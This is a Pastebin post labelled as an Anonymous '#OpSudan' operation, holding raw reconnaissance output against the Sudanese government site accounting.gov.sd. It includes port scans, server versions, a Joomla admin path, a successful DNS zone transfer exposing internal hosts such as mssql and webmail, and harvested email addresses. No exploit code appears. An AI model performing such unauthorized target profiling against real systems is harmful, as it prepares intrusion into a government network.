Advertisement
Guest User

Anonymous JTSEC #OpSudan Full Recon #5

a guest
Feb 11th, 2019
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 139.34 KB | None | 0 0
  1. #######################################################################################################################################
  2. =======================================================================================================================================
  3. Hostname accounting.gov.sd ISP NICDC
  4. Continent Africa Flag
  5. SD
  6. Country Sudan Country Code SD
  7. Region Unknown Local time 12 Feb 2019 02:34 CAT
  8. City Unknown Postal Code Unknown
  9. IP Address 62.12.101.14 Latitude 15
  10. Longitude 30
  11. =======================================================================================================================================
  12. #######################################################################################################################################
  13. > accounting.gov.sd
  14. Server: 38.132.106.139
  15. Address: 38.132.106.139#53
  16.  
  17. Non-authoritative answer:
  18. Name: accounting.gov.sd
  19. Address: 62.12.101.14
  20. >
  21. #######################################################################################################################################
  22. HostIP:62.12.101.14
  23. HostName:accounting.gov.sd
  24.  
  25. Gathered Inet-whois information for 62.12.101.14
  26. ---------------------------------------------------------------------------------------------------------------------------------------
  27.  
  28.  
  29. inetnum: 62.12.96.0 - 62.12.127.255
  30. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  31. descr: IPv4 address block not managed by the RIPE NCC
  32. remarks: ------------------------------------------------------
  33. remarks:
  34. remarks: For registration information,
  35. remarks: you can consult the following sources:
  36. remarks:
  37. remarks: IANA
  38. remarks: http://www.iana.org/assignments/ipv4-address-space
  39. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  40. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  41. remarks:
  42. remarks: AFRINIC (Africa)
  43. remarks: http://www.afrinic.net/ whois.afrinic.net
  44. remarks:
  45. remarks: APNIC (Asia Pacific)
  46. remarks: http://www.apnic.net/ whois.apnic.net
  47. remarks:
  48. remarks: ARIN (Northern America)
  49. remarks: http://www.arin.net/ whois.arin.net
  50. remarks:
  51. remarks: LACNIC (Latin America and the Carribean)
  52. remarks: http://www.lacnic.net/ whois.lacnic.net
  53. remarks:
  54. remarks: ------------------------------------------------------
  55. country: EU # Country is really world wide
  56. admin-c: IANA1-RIPE
  57. tech-c: IANA1-RIPE
  58. status: ALLOCATED UNSPECIFIED
  59. mnt-by: RIPE-NCC-HM-MNT
  60. created: 2019-01-07T10:46:54Z
  61. last-modified: 2019-01-07T10:46:54Z
  62. source: RIPE
  63.  
  64. role: Internet Assigned Numbers Authority
  65. address: see http://www.iana.org.
  66. admin-c: IANA1-RIPE
  67. tech-c: IANA1-RIPE
  68. nic-hdl: IANA1-RIPE
  69. remarks: For more information on IANA services
  70. remarks: go to IANA web site at http://www.iana.org.
  71. mnt-by: RIPE-NCC-MNT
  72. created: 1970-01-01T00:00:00Z
  73. last-modified: 2001-09-22T09:31:27Z
  74. source: RIPE # Filtered
  75.  
  76. % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
  77.  
  78.  
  79.  
  80. Gathered Inic-whois information for accounting.gov.sd
  81. ---------------------------------------------------------------------------------------------------------------------------------------
  82. Error: Unable to connect - Invalid Host
  83. ERROR: Connection to InicWhois Server sd.whois-servers.net failed
  84. close error
  85.  
  86. Gathered Netcraft information for accounting.gov.sd
  87. ---------------------------------------------------------------------------------------------------------------------------------------
  88.  
  89. Retrieving Netcraft.com information for accounting.gov.sd
  90. Netcraft.com Information gathered
  91.  
  92. Gathered Subdomain information for accounting.gov.sd
  93. ---------------------------------------------------------------------------------------------------------------------------------------
  94. Searching Google.com:80...
  95. HostName:www.accounting.gov.sd
  96. HostIP:62.12.101.14
  97. Searching Altavista.com:80...
  98. Found 1 possible subdomain(s) for host accounting.gov.sd, Searched 0 pages containing 0 results
  99.  
  100. Gathered E-Mail information for accounting.gov.sd
  101. ---------------------------------------------------------------------------------------------------------------------------------------
  102. Searching Google.com:80...
  103. Searching Altavista.com:80...
  104. Found 0 E-Mail(s) for host accounting.gov.sd, Searched 0 pages containing 0 results
  105.  
  106. Gathered TCP Port information for 62.12.101.14
  107. ---------------------------------------------------------------------------------------------------------------------------------------
  108.  
  109. Port State
  110.  
  111. 22/tcp open
  112. 80/tcp open
  113.  
  114. Portscan Finished: Scanned 150 ports, 6 ports were in state closed
  115. #######################################################################################################################################
  116. [i] Scanning Site: http://accounting.gov.sd
  117.  
  118.  
  119.  
  120. B A S I C I N F O
  121. =======================================================================================================================================
  122.  
  123.  
  124. [+] Site Title: الرئيسية - ديوان الحسابات
  125. [+] IP address: 62.12.101.14
  126. [+] Web Server: Could Not Detect
  127. [+] CMS: Joomla
  128. [+] Cloudflare: Not Detected
  129. [+] Robots File: Found
  130.  
  131. -------------[ contents ]----------------
  132. # If the Joomla site is installed within a folder such as at
  133. # e.g. www.example.com/joomla/ the robots.txt file MUST be
  134. # moved to the site root at e.g. www.example.com/robots.txt
  135. # AND the joomla folder name MUST be prefixed to the disallowed
  136. # path, e.g. the Disallow rule for the /administrator/ folder
  137. # MUST be changed to read Disallow: /joomla/administrator/
  138. #
  139. # For more information about the robots.txt standard, see:
  140. # http://www.robotstxt.org/orig.html
  141. #
  142. # For syntax checking, see:
  143. # http://www.sxw.org.uk/computing/robots/check.html
  144.  
  145. User-agent: *
  146. Disallow: /administrator/
  147. Disallow: /cache/
  148. Disallow: /cli/
  149. Disallow: /components/
  150. Disallow: /images/
  151. Disallow: /includes/
  152. Disallow: /installation/
  153. Disallow: /language/
  154. Disallow: /libraries/
  155. Disallow: /logs/
  156. Disallow: /media/
  157. Disallow: /modules/
  158. Disallow: /plugins/
  159. Disallow: /templates/
  160. Disallow: /tmp/
  161.  
  162.  
  163. -----------[end of contents]-------------
  164.  
  165.  
  166.  
  167.  
  168.  
  169. G E O I P L O O K U P
  170. =======================================================================================================================================
  171.  
  172. [i] IP Address: 62.12.101.14
  173. [i] Country: Sudan
  174. [i] State:
  175. [i] City:
  176. [i] Latitude: 15.0
  177. [i] Longitude: 30.0
  178.  
  179.  
  180.  
  181.  
  182. H T T P H E A D E R S
  183. =======================================================================================================================================
  184.  
  185.  
  186. [i] HTTP/1.1 200 OK
  187. [i] Date: Tue, 12 Feb 2019 01:42:48 GMT
  188. [i] X-Powered-By: PHP/5.6.18
  189. [i] Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=jl5n6emrjg8597otilf4jkohk2; path=/; HttpOnly
  190. [i] X-Logged-In: False
  191. [i] P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  192. [i] Expires: Mon, 1 Jan 2001 00:00:00 GMT
  193. [i] Last-Modified: Tue, 12 Feb 2019 01:42:48 GMT
  194. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  195. [i] Pragma: no-cache
  196. [i] Content-Type: text/html; charset=utf-8
  197. [i] Connection: close
  198.  
  199.  
  200.  
  201.  
  202. D N S L O O K U P
  203. =======================================================================================================================================
  204.  
  205. accounting.gov.sd. 21599 IN SOA ns0.ndc.gov.sd. root.ndc.gov.sd. 2018021300 10800 900 604800 86400
  206. accounting.gov.sd. 21599 IN NS ns0.ndc.gov.sd.
  207. accounting.gov.sd. 21599 IN NS ns1.ndc.gov.sd.
  208. accounting.gov.sd. 21599 IN A 62.12.101.14
  209. accounting.gov.sd. 21599 IN MX 10 f03-web01.nic.gov.sd.
  210. accounting.gov.sd. 21599 IN TXT "v=spf1 mx -all"
  211.  
  212.  
  213.  
  214.  
  215. S U B N E T C A L C U L A T I O N
  216. =======================================================================================================================================
  217.  
  218. Address = 62.12.101.14
  219. Network = 62.12.101.14 / 32
  220. Netmask = 255.255.255.255
  221. Broadcast = not needed on Point-to-Point links
  222. Wildcard Mask = 0.0.0.0
  223. Hosts Bits = 0
  224. Max. Hosts = 1 (2^0 - 0)
  225. Host Range = { 62.12.101.14 - 62.12.101.14 }
  226.  
  227.  
  228.  
  229. N M A P P O R T S C A N
  230. =======================================================================================================================================
  231.  
  232.  
  233. Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-12 01:42 UTC
  234. Nmap scan report for accounting.gov.sd (62.12.101.14)
  235. Host is up (0.21s latency).
  236. PORT STATE SERVICE
  237. 21/tcp filtered ftp
  238. 22/tcp open ssh
  239. 23/tcp filtered telnet
  240. 80/tcp open http
  241. 110/tcp closed pop3
  242. 143/tcp closed imap
  243. 443/tcp filtered https
  244. 3389/tcp filtered ms-wbt-server
  245.  
  246. Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
  247. #######################################################################################################################################
  248. [?] Enter the target: example( http://domain.com )
  249. http://accounting.gov.sd/
  250. [!] IP Address : 62.12.101.14
  251. [!] accounting.gov.sd doesn't seem to use a CMS
  252. [+] Honeypot Probabilty: 0%
  253. ---------------------------------------------------------------------------------------------------------------------------------------
  254. [~] Trying to gather whois information for accounting.gov.sd
  255. [+] Whois information found
  256. [-] Unable to build response, visit https://who.is/whois/accounting.gov.sd
  257. ---------------------------------------------------------------------------------------------------------------------------------------
  258. PORT STATE SERVICE
  259. 21/tcp filtered ftp
  260. 22/tcp open ssh
  261. 23/tcp filtered telnet
  262. 80/tcp open http
  263. 110/tcp closed pop3
  264. 143/tcp closed imap
  265. 443/tcp filtered https
  266. 3389/tcp filtered ms-wbt-server
  267. Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
  268. ---------------------------------------------------------------------------------------------------------------------------------------
  269.  
  270. [+] DNS Records
  271. ns1.ndc.gov.sd. (62.12.109.3) Egypt Egypt
  272. ns0.ndc.gov.sd. (62.12.109.2) Egypt Egypt
  273.  
  274. [+] MX Records
  275. 10 (62.12.105.3) Egypt Egypt
  276.  
  277. [+] Host Records (A)
  278. accounting.gov.sd (62.12.101.14) Egypt Egypt
  279.  
  280. [+] TXT Records
  281. "v=spf1 mx -all"
  282.  
  283. [+] DNS Map: https://dnsdumpster.com/static/map/accounting.gov.sd.png
  284.  
  285. [>] Initiating 3 intel modules
  286. [>] Loading Alpha module (1/3)
  287. [>] Beta module deployed (2/3)
  288. [>] Gamma module initiated (3/3)
  289.  
  290.  
  291. [+] Emails found:
  292. ---------------------------------------------------------------------------------------------------------------------------------------
  293. pixel-1549936113434480-web-@accounting.gov.sd
  294. pixel-1549936115493260-web-@accounting.gov.sd
  295.  
  296. [+] Hosts found in search engines:
  297. ---------------------------------------------------------------------------------------------------------------------------------------
  298. [-] Resolving hostnames IPs...
  299. 62.12.101.14:www.accounting.gov.sd
  300. [+] Virtual hosts:
  301. ---------------------------------------------------------------------------------------------------------------------------------------
  302. ######################################################################################################################################
  303. Reverse IP With YouGetSignal 'accounting.gov.sd'
  304. ---------------------------------------------------------------------------------------------------------------------------------------
  305.  
  306. [*] IP: 62.12.101.14
  307. [*] Domain: accounting.gov.sd
  308. [*] Total Domains: 1
  309.  
  310. [+] accounting.gov.sd
  311. #######################################################################################################################################
  312. Geo IP Lookup 'accounting.gov.sd'
  313. ---------------------------------------------------------------------------------------------------------------------------------------
  314.  
  315. [+] IP Address: 62.12.101.14
  316. [+] Country: Sudan
  317. [+] State:
  318. [+] City:
  319. [+] Latitude: 15.0
  320. [+] Longitude: 30.0
  321. #######################################################################################################################################
  322. DNS Lookup 'accounting.gov.sd'
  323. ---------------------------------------------------------------------------------------------------------------------------------------
  324.  
  325. [+] accounting.gov.sd. 20701 IN SOA ns0.ndc.gov.sd. root.ndc.gov.sd. 2018021300 10800 900 604800 86400
  326. [+] accounting.gov.sd. 20701 IN NS ns0.ndc.gov.sd.
  327. [+] accounting.gov.sd. 20701 IN NS ns1.ndc.gov.sd.
  328. [+] accounting.gov.sd. 20701 IN A 62.12.101.14
  329. [+] accounting.gov.sd. 20701 IN MX 10 f03-web01.nic.gov.sd.
  330. [+] accounting.gov.sd. 20701 IN TXT "v=spf1 mx -all"
  331. #######################################################################################################################################
  332. Show HTTP Header 'accounting.gov.sd'
  333. ---------------------------------------------------------------------------------------------------------------------------------------
  334.  
  335. [+] HTTP/1.1 200 OK
  336. [+] Date: Tue, 12 Feb 2019 01:57:49 GMT
  337. [+] Server: Apache/2.2.15 (CentOS)
  338. [+] X-Powered-By: PHP/5.6.18
  339. [+] Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=080q50tbjtdmp2bco2sp758j10; path=/; HttpOnly
  340. [+] X-Logged-In: False
  341. [+] P3P: CP=NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM
  342. [+] Expires: Mon, 1 Jan 2001 00:00:00 GMT
  343. [+] Last-Modified: Tue, 12 Feb 2019 01:57:49 GMT
  344. [+] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  345. [+] Pragma: no-cache
  346. [+] Connection: close
  347. [+] Content-Type: text/html; charset=utf-8
  348. #######################################################################################################################################
  349. Port Scan 'accounting.gov.sd'
  350. ---------------------------------------------------------------------------------------------------------------------------------------
  351.  
  352.  
  353. Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-12 01:57 UTC
  354. Nmap scan report for accounting.gov.sd (62.12.101.14)
  355. Host is up (0.21s latency).
  356. PORT STATE SERVICE
  357. 21/tcp filtered ftp
  358. 22/tcp open ssh
  359. 23/tcp filtered telnet
  360. 80/tcp open http
  361. 110/tcp closed pop3
  362. 143/tcp closed imap
  363. 443/tcp filtered https
  364. 3389/tcp filtered ms-wbt-server
  365.  
  366. Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
  367. #######################################################################################################################################
  368. Robot.txt 'accounting.gov.sd'
  369. ---------------------------------------------------------------------------------------------------------------------------------------
  370.  
  371. # If the Joomla site is installed within a folder such as at
  372. # e.g. www.example.com/joomla/ the robots.txt file MUST be
  373. # moved to the site root at e.g. www.example.com/robots.txt
  374. # AND the joomla folder name MUST be prefixed to the disallowed
  375. # path, e.g. the Disallow rule for the /administrator/ folder
  376. # MUST be changed to read Disallow: /joomla/administrator/
  377. #
  378. # For more information about the robots.txt standard, see:
  379. # http://www.robotstxt.org/orig.html
  380. #
  381. # For syntax checking, see:
  382. # http://www.sxw.org.uk/computing/robots/check.html
  383.  
  384. User-agent: *
  385. Disallow: /administrator/
  386. Disallow: /cache/
  387. Disallow: /cli/
  388. Disallow: /components/
  389. Disallow: /images/
  390. Disallow: /includes/
  391. Disallow: /installation/
  392. Disallow: /language/
  393. Disallow: /libraries/
  394. Disallow: /logs/
  395. Disallow: /media/
  396. Disallow: /modules/
  397. Disallow: /plugins/
  398. Disallow: /templates/
  399. Disallow: /tmp/
  400. #######################################################################################################################################
  401. Traceroute 'accounting.gov.sd'
  402. ---------------------------------------------------------------------------------------------------------------------------------------
  403.  
  404. Start: 2019-02-12T01:58:00+0000
  405. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  406. 1.|-- 45.79.12.202 0.0% 3 0.7 0.7 0.7 0.9 0.1
  407. 2.|-- 45.79.12.2 0.0% 3 0.8 0.7 0.5 0.9 0.2
  408. 3.|-- ix-et-5-1-2-0.tcore1.dt8-dallas.as6453.net 0.0% 3 1.3 1.9 1.3 3.0 0.9
  409. 4.|-- if-ae-2-2.tcore2.dt8-dallas.as6453.net 0.0% 3 140.5 140.1 139.8 140.5 0.3
  410. 5.|-- if-ae-34-2.tcore1.lvw-los-angeles.as6453.net 0.0% 3 139.9 145.6 139.9 156.7 9.6
  411. 6.|-- if-ae-2-2.tcore2.lvw-los-angeles.as6453.net 0.0% 3 141.7 148.1 141.5 161.2 11.4
  412. 7.|-- if-et-53-2.hcore2.kv8-chiba.as6453.net 0.0% 3 144.4 145.6 144.4 148.1 2.1
  413. 8.|-- if-ae-24-2.tcore2.tv2-tokyo.as6453.net 0.0% 3 145.7 145.7 145.7 145.8 0.0
  414. 9.|-- 180.87.181.34 0.0% 3 140.0 139.7 139.5 140.0 0.2
  415. 10.|-- ae0.0.pjr02.wad001.flagtel.com 0.0% 3 288.7 289.5 288.7 290.9 1.2
  416. 11.|-- ge-4-0-0.0.pjr02.hkg005.flagtel.com 0.0% 3 292.9 291.6 288.7 293.2 2.5
  417. 12.|-- so-3-0-0.0.pjr02.mmb004.flagtel.com 0.0% 3 291.7 291.1 290.8 291.7 0.5
  418. 13.|-- xe-8-3-0.0.pjr04.mmb004.flagtel.com 0.0% 3 267.1 265.7 264.8 267.1 1.2
  419. 14.|-- xe-11-0-1.0.pjr04.dxb001.flagtel.com 0.0% 3 289.1 289.0 288.7 289.2 0.3
  420. 15.|-- 80.77.2.42 0.0% 3 265.6 265.4 264.6 266.1 0.7
  421. 16.|-- 196.29.177.113 0.0% 3 267.7 267.4 267.2 267.7 0.2
  422. 17.|-- 197.254.196.62 0.0% 3 275.9 276.0 275.9 276.1 0.1
  423. 18.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  424. #######################################################################################################################################
  425. Ping 'accounting.gov.sd'
  426. ---------------------------------------------------------------------------------------------------------------------------------------
  427.  
  428.  
  429. Starting Nping 0.7.70 ( https://nmap.org/nping ) at 2019-02-12 01:58 UTC
  430. SENT (0.2929s) ICMP [104.237.144.6 > 62.12.101.14 Echo request (type=8/code=0) id=12827 seq=1] IP [ttl=64 id=58426 iplen=28 ]
  431. SENT (1.2933s) ICMP [104.237.144.6 > 62.12.101.14 Echo request (type=8/code=0) id=12827 seq=2] IP [ttl=64 id=58426 iplen=28 ]
  432. SENT (2.2945s) ICMP [104.237.144.6 > 62.12.101.14 Echo request (type=8/code=0) id=12827 seq=3] IP [ttl=64 id=58426 iplen=28 ]
  433. SENT (3.2958s) ICMP [104.237.144.6 > 62.12.101.14 Echo request (type=8/code=0) id=12827 seq=4] IP [ttl=64 id=58426 iplen=28 ]
  434.  
  435. Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A
  436. Raw packets sent: 4 (112B) | Rcvd: 0 (0B) | Lost: 4 (100.00%)
  437. Nping done: 1 IP address pinged in 4.30 seconds
  438. #######################################################################################################################################
  439. Page Admin Finder 'accounting.gov.sd'
  440. ---------------------------------------------------------------------------------------------------------------------------------------
  441.  
  442. Avilable Links :
  443.  
  444. Find Page >> http://accounting.gov.sd/administrator/
  445.  
  446. Find Page >> http://accounting.gov.sd/administrator/index.php
  447. #######################################################################################################################################
  448. ; <<>> DiG 9.11.5-P1-1-Debian <<>> accounting.gov.sd
  449. ;; global options: +cmd
  450. ;; Got answer:
  451. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44165
  452. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  453.  
  454. ;; OPT PSEUDOSECTION:
  455. ; EDNS: version: 0, flags:; udp: 4096
  456. ;; QUESTION SECTION:
  457. ;accounting.gov.sd. IN A
  458.  
  459. ;; ANSWER SECTION:
  460. accounting.gov.sd. 80623 IN A 62.12.101.14
  461.  
  462. ;; Query time: 100 msec
  463. ;; SERVER: 38.132.106.139#53(38.132.106.139)
  464. ;; WHEN: lun fév 11 21:10:41 EST 2019
  465. ;; MSG SIZE rcvd: 62
  466. #######################################################################################################################################
  467. ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace accounting.gov.sd
  468. ;; global options: +cmd
  469. . 83450 IN NS b.root-servers.net.
  470. . 83450 IN NS a.root-servers.net.
  471. . 83450 IN NS i.root-servers.net.
  472. . 83450 IN NS j.root-servers.net.
  473. . 83450 IN NS d.root-servers.net.
  474. . 83450 IN NS e.root-servers.net.
  475. . 83450 IN NS l.root-servers.net.
  476. . 83450 IN NS g.root-servers.net.
  477. . 83450 IN NS m.root-servers.net.
  478. . 83450 IN NS k.root-servers.net.
  479. . 83450 IN NS c.root-servers.net.
  480. . 83450 IN NS f.root-servers.net.
  481. . 83450 IN NS h.root-servers.net.
  482. . 83450 IN RRSIG NS 8 0 518400 20190224210000 20190211200000 16749 . tEqTYjnGNdEMjbRhQuqyrYHf9Os8fIrDGcYmTDK7LXipePbmYbROzjUI aCcgYAggiQFfCIIFjLjEw7rElADY6FYV/GjjWTzT2711+k943xFNUJtM IrF/1uu7cD7GzdPxooLqONSS85o/ba5WWyCD4W8e/zw1ZNl+pBVkFhMR aa72fpCfTRKXQd9ulhgM7Ep6E7YJ4dP5TZMdAmTyevu4QUt/RWFS8xYb X2KdZuu7F+WRyqQ3svmGZ+vU5XwyX2Eh9CzB4b/RGuLkMdouiBVOR6tc r1jgUduo2hndsqzFTSLE1xjikal8FQg0pRqycTzjv9Zs+ARAR+AT5TKQ recy/A==
  483. ;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 98 ms
  484.  
  485. sd. 172800 IN NS ns-sd.afrinic.net.
  486. sd. 172800 IN NS ans2.canar.sd.
  487. sd. 172800 IN NS ns1.uaenic.ae.
  488. sd. 172800 IN NS ns2.uaenic.ae.
  489. sd. 172800 IN NS ans1.sis.sd.
  490. sd. 172800 IN NS ans1.canar.sd.
  491. sd. 172800 IN NS sd.cctld.authdns.ripe.net.
  492. sd. 86400 IN NSEC se. NS RRSIG NSEC
  493. sd. 86400 IN RRSIG NSEC 8 1 86400 20190224210000 20190211200000 16749 . ONqvCCUFLMIYLZ5yw57cxBhCT/wUS6hp7Bn2m8QUh9MCo8CNvKy6ci/g mhGedeItUlqwl05oKQCJFMMGMaPp72bj7ApafOB6fByBfGBMElT6cqSG lt+k4/DYComzvMU9BUIX3uSsbp97ei3MVZ7b07TOQl3kWTDuC/WPfSjF BAt2cphkFLcrjasuGHiscoBeONRKXxDaEfnYYl9Fg0435tnxxyI+sooe reolb7qKdtyauHRjRny93S0Y1oWNbM3t/oURKzQPwphrxllXJtsHkQ0o 0lyRHFVwvB+qUjcBaTi9QGOqGEbRp5cXWOR+i64rI1Rlw71//uBxvEeO dh4wIw==
  494. ;; Received 732 bytes from 2001:500:200::b#53(b.root-servers.net) in 69 ms
  495.  
  496. ;; Received 74 bytes from 213.42.0.226#53(ns1.uaenic.ae) in 285 ms
  497. #######################################################################################################################################
  498. [*] Performing General Enumeration of Domain: accounting.gov.sd
  499. [-] DNSSEC is not configured for accounting.gov.sd
  500. [*] SOA ns0.ndc.gov.sd 62.12.109.2
  501. [*] NS ns0.ndc.gov.sd 62.12.109.2
  502. [*] Bind Version for 62.12.109.2 you guess!
  503. [*] NS ns1.ndc.gov.sd 62.12.109.3
  504. [*] Bind Version for 62.12.109.3 you guess!
  505. [*] MX f03-web01.nic.gov.sd 62.12.105.3
  506. [*] A accounting.gov.sd 62.12.101.14
  507. [*] TXT accounting.gov.sd v=spf1 mx -all
  508. [*] Enumerating SRV Records
  509. [-] No SRV Records Found for accounting.gov.sd
  510. [+] 0 Records Found
  511. #######################################################################################################################################
  512. [*] Processing domain accounting.gov.sd
  513. [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
  514. [+] Getting nameservers
  515. 62.12.109.2 - ns0.ndc.gov.sd
  516. [+] Zone transfer sucessful using nameserver ns0.ndc.gov.sd
  517. accounting.gov.sd. 86400 IN SOA ns0.ndc.gov.sd. root.ndc.gov.sd. 2018021300 10800 900 604800 86400
  518. accounting.gov.sd. 86400 IN NS ns0.ndc.gov.sd.
  519. accounting.gov.sd. 86400 IN NS ns1.ndc.gov.sd.
  520. accounting.gov.sd. 86400 IN A 62.12.101.14
  521. accounting.gov.sd. 86400 IN MX 10 f03-web01.nic.gov.sd.
  522. accounting.gov.sd. 86400 IN TXT "v=spf1 mx -all"
  523. mail.accounting.gov.sd. 86400 IN A 62.12.105.3
  524. mail.accounting.gov.sd. 86400 IN MX 10 mail.accounting.gov.sd.
  525. mailclient.accounting.gov.sd. 86400 IN A 62.12.101.14
  526. mssql.accounting.gov.sd. 86400 IN A 62.12.105.3
  527. ticket.accounting.gov.sd. 86400 IN A 62.12.101.14
  528. webmail.accounting.gov.sd. 86400 IN CNAME mail.accounting.gov.sd.
  529. www.accounting.gov.sd. 86400 IN A 62.12.101.14
  530. #######################################################################################################################################
  531. Ip Address Status Type Domain Name Server
  532. ---------- ------ ---- ----------- ------
  533. 62.12.105.3 200 host mail.accounting.gov.sd Microsoft-IIS/8.5
  534. 62.12.101.14 200 host mailclient.accounting.gov.sd Apache/2.2.15 (CentOS)
  535. 62.12.105.3 200 host mssql.accounting.gov.sd Microsoft-IIS/8.5
  536. 62.12.101.14 200 host ticket.accounting.gov.sd Apache/2.2.15 (CentOS)
  537. 62.12.105.3 302 alias webmail.accounting.gov.sd Microsoft-IIS/8.5
  538. 62.12.105.3 302 host mail.accounting.gov.sd Microsoft-IIS/8.5
  539. 62.12.101.14 200 host www.accounting.gov.sd Apache/2.2.15 (CentOS)
  540. #######################################################################################################################################
  541. [+] Testing domain
  542. www.accounting.gov.sd 62.12.101.14
  543. [+] Dns resolving
  544. Domain name Ip address Name server
  545. No address associated with hostname accounting.gov.sd
  546. [+] Testing wildcard
  547. Ok, no wildcard found.
  548.  
  549. [+] Scanning for subdomain on accounting.gov.sd
  550. [!] Wordlist not specified. I scannig with my internal wordlist...
  551. Estimated time about 154.52 seconds
  552.  
  553. Subdomain Ip address Name server
  554.  
  555. mail.accounting.gov.sd 62.12.105.3 f03-web01.nic.gov.sd
  556. mssql.accounting.gov.sd 62.12.105.3 f03-web01.nic.gov.sd
  557. webmail.accounting.gov.sd 62.12.105.3 f03-web01.nic.gov.sd
  558. #######################################################################################################################################
  559. =======================================================================================================================================
  560. | E-mails:
  561. | [+] E-mail Found: kevinh@kevcom.com
  562. | [+] E-mail Found: mike@hyperreal.org
  563. | [+] E-mail Found: admin@accounting.gov.sd
  564. | [+] E-mail Found: shamoco@mail.net
  565. | [+] E-mail Found: info@joomla-monster.com
  566. =======================================================================================================================================
  567. | External hosts:
  568. | [+] External Host Found: http://httpd.apache.org
  569. =======================================================================================================================================
  570. #######################################################################################################################################
  571. dnsenum VERSION:1.2.4
  572.  
  573. ----- accounting.gov.sd -----
  574.  
  575.  
  576. Host's addresses:
  577. __________________
  578.  
  579. accounting.gov.sd. 80773 IN A 62.12.101.14
  580.  
  581.  
  582. Name Servers:
  583. ______________
  584.  
  585. ns0.ndc.gov.sd. 8772 IN A 62.12.109.2
  586. ns1.ndc.gov.sd. 8772 IN A 62.12.109.3
  587.  
  588.  
  589. Mail (MX) Servers:
  590. ___________________
  591.  
  592. f03-web01.nic.gov.sd. 86400 IN A 62.12.105.3
  593.  
  594.  
  595. Trying Zone Transfers and getting Bind Versions:
  596. _________________________________________________
  597.  
  598.  
  599. Trying Zone Transfer for accounting.gov.sd on ns0.ndc.gov.sd ...
  600. accounting.gov.sd. 86400 IN SOA (
  601. accounting.gov.sd. 86400 IN NS ns0.ndc.gov.sd.
  602. accounting.gov.sd. 86400 IN NS ns1.ndc.gov.sd.
  603. accounting.gov.sd. 86400 IN A 62.12.101.14
  604. accounting.gov.sd. 86400 IN MX 10
  605. accounting.gov.sd. 86400 IN TXT "v=spf1
  606. mail.accounting.gov.sd. 86400 IN A 62.12.105.3
  607. mail.accounting.gov.sd. 86400 IN MX 10
  608. mailclient.accounting.gov.sd. 86400 IN A 62.12.101.14
  609. mssql.accounting.gov.sd. 86400 IN A 62.12.105.3
  610. ticket.accounting.gov.sd. 86400 IN A 62.12.101.14
  611. webmail.accounting.gov.sd. 86400 IN CNAME mail.accounting.gov.sd.
  612. www.accounting.gov.sd. 86400 IN A 62.12.101.14
  613.  
  614. Trying Zone Transfer for accounting.gov.sd on ns1.ndc.gov.sd ...
  615. accounting.gov.sd. 86400 IN SOA (
  616. accounting.gov.sd. 86400 IN NS ns0.ndc.gov.sd.
  617. accounting.gov.sd. 86400 IN NS ns1.ndc.gov.sd.
  618. accounting.gov.sd. 86400 IN A 62.12.101.14
  619. accounting.gov.sd. 86400 IN MX 10
  620. accounting.gov.sd. 86400 IN TXT "v=spf1
  621. mail.accounting.gov.sd. 86400 IN A 62.12.105.3
  622. mail.accounting.gov.sd. 86400 IN MX 10
  623. mailclient.accounting.gov.sd. 86400 IN A 62.12.101.14
  624. mssql.accounting.gov.sd. 86400 IN A 62.12.105.3
  625. ticket.accounting.gov.sd. 86400 IN A 62.12.101.14
  626. webmail.accounting.gov.sd. 86400 IN CNAME mail.accounting.gov.sd.
  627. www.accounting.gov.sd. 86400 IN A 62.12.101.14
  628.  
  629. brute force file not specified, bay.
  630. #######################################################################################################################################
  631.  
  632. ____ _ _ _ _ _____
  633. / ___| _ _| |__ | (_)___| |_|___ / _ __
  634. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  635. ___) | |_| | |_) | | \__ \ |_ ___) | |
  636. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  637.  
  638. # Coded By Ahmed Aboul-Ela - @aboul3la
  639.  
  640. [-] Enumerating subdomains now for accounting.gov.sd
  641. [-] verbosity is enabled, will show the subdomains results in realtime
  642. [-] Searching now in Baidu..
  643. [-] Searching now in Yahoo..
  644. [-] Searching now in Google..
  645. [-] Searching now in Bing..
  646. [-] Searching now in Ask..
  647. [-] Searching now in Netcraft..
  648. [-] Searching now in DNSdumpster..
  649. [-] Searching now in Virustotal..
  650. [-] Searching now in ThreatCrowd..
  651. [-] Searching now in SSL Certificates..
  652. [-] Searching now in PassiveDNS..
  653. Virustotal: www.accounting.gov.sd
  654. Bing: webmail.accounting.gov.sd
  655. Yahoo: www.accounting.gov.sd
  656. Yahoo: webmail.accounting.gov.sd
  657. Google: ticket.accounting.gov.sd
  658. Google: webmail.accounting.gov.sd
  659. [-] Saving results to file: /usr/share/sniper/loot//domains/domains-accounting.gov.sd.txt
  660. [-] Total Unique Subdomains Found: 3
  661. www.accounting.gov.sd
  662. ticket.accounting.gov.sd
  663. webmail.accounting.gov.sd
  664. #######################################################################################################################################
  665. ===============================================
  666. -=Subfinder v1.1.3 github.com/subfinder/subfinder
  667. ===============================================
  668.  
  669.  
  670. Running Source: Ask
